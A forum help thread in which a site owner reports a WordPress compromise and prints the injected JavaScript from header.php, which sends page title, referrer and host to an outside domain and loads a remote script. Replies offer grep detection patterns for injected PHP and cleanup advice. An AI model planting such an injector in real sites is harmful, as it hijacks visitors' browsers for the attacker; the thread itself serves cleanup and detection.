Reputation: 395
Looking for some help from anyone who is familiar with jquery Malware. I have been infected with an Injected Script in my WordPress website and everytime I remove the Injected Code from my Header.php 24 Hours later it has injected a modified version of it back into the Header.php files on my hosting server.
Driving me crazy. The site is www.icrsolutions.co.uk and the script reads below:
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://uniluxvfc.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
Upvotes: 0
Views: 6121
Reputation: 160
The following applies to Joomla as well:
grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }'
egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null
Upvotes: 4
Reputation: 3709
Change every password and then delete the scripts / malicious code.
Then after that, update every plugin, and wordpress itself.
Upvotes: 1